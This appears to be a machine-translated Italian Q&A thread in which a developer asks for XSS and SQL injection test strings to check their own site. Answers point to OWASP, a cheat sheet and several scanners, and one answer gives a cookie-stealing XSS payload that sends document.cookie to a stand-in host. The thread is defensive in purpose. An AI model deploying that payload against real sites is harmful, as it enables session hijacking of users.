1. casa
  2. Domanda e risposta
  3. Qualcuno può darmi degli script di base per XSS e SQL? (non è quello che sembra)

Qualcuno può darmi degli script di base per XSS e SQL? (non è quello che sembra)

2010-05-08 5 views
10

Sto testando i miei script per vedere se impediranno le iniezioni di xss e sql. Qualcuno può fornirmi degli script di base ma buoni che "hackeranno" nei miei programmi. Voglio testare i miei script prima che vadano online.Qualcuno può darmi degli script di base per XSS e SQL? (non è quello che sembra)

MODIFICA: Grazie a tutti per questi collegamenti, contengono un sacco di informazioni. Ma per un principiante alla sicurezza, c'è un sito raccomandato? Non sono sicuro di essere pronto per immergermi nei problemi di sicurezza in-down. Mi piacciono i collegamenti consigliati da waiwai933.

fonte

2010-05-08 ggfan

risposta

5

Ogni situazione richiede script diversi, quindi non esiste una "taglia unica" che chiunque possa fornire. L'elenco degli script che dovrebbero essere testati va a migliaia prima di poter essere certi che il tuo sito sia sicuro.

Si consiglia di controllare i plugin di Firefox o Chrome che consentono di testare le iniezioni SQL. Suggerisco questo, ma si consiglia di cercare anche gli altri: https://addons.mozilla.org/en-US/firefox/addon/6727. Ciò che fa è che ti permette di fornire un elenco di script di injection, che probabilmente fornisce alcuni di default, e poi, una volta attivato, bombarda il tuo sito con questi script e ti consente di vedere dove si trovano le vulnerabilità.

vi suggerisco questo sito per alcuni esempi di script XSS: http://ha.ckers.org/xss.html

fonte

2010-05-08 02:47:15 waiwai933

+0

grazie! Puoi descrivere brevemente cosa fa l'addon? – ggfan

+0

vai al sito e leggi la descrizione? – Galen

+0

+1 per l'ultimo link – chelmertz

1

Il più semplice, che non ottiene bloccato dai browser e può accadere facilmente se non strip_tags() è il seguente codice:

<script>(new Image).src = 'http://example.com/logSessions.php?s=' + document.cookie;</script>

fonte

2010-05-08 02:50:54

+0

Per la cronaca, 'nasty.com' è un sito porno straniero. Basta dire. – mattbasta

1

Il nuovo sito di istruzioni di Googe jarslberg è un'ottima risorsa per insegnare come scrivere e difendersi contro XSS e molti altri attacchi di sicurezza.

fonte

2010-05-08 02:51:50

1

+1 per la cura e la conoscenza basta chiedere. Dal momento che stai ponendo domande sulla sicurezza, mi piacerebbe raccomandare il sito web OWASP se non lo conosci già. Troverai tutti i tipi di informazioni al di sopra di ciò che hai chiesto. Per non parlare di un'infinità di informazioni sulla prevenzione di ogni tipo di attacco. Il sito è uno strumento inestimabile per gli sviluppatori web.

fonte

2010-05-08 02:58:35 David

+0

grazie! Ill guardare nel sito – ggfan

2

Il cheatsheet XSS allo http://ha.ckers.org/xss.html è una buona raccolta di test XSS. Non raccomanderei comunque di implementare il proprio correttore XSS; è molto più difficile del rilevamento di iniezioni SQL (come probabilmente vi accorgerete dopo aver visto alcuni degli esempi nel cheatsheet). L'unico metodo solido è quello di analizzare il codice, costruire un albero DOM da esso e trasformare quell'albero in HTML, e questo è un sacco di lavoro, e altre persone lo hanno già fatto. Usa qualcosa come HTML Purifier.

fonte

2010-05-08 11:18:02 Tgr

0

Si può provare con lo scanner di sicurezza Acunetix, non eseguirà la scansione solo per l'iniezione XSS e MySQL di default ma anche per altri tipi di exploit. Il programma emula praticamente un browser e può comportarsi come un utente connesso.

fonte

2010-05-08 11:31:20 Kemo

Problemi correlati

 Problemi correlati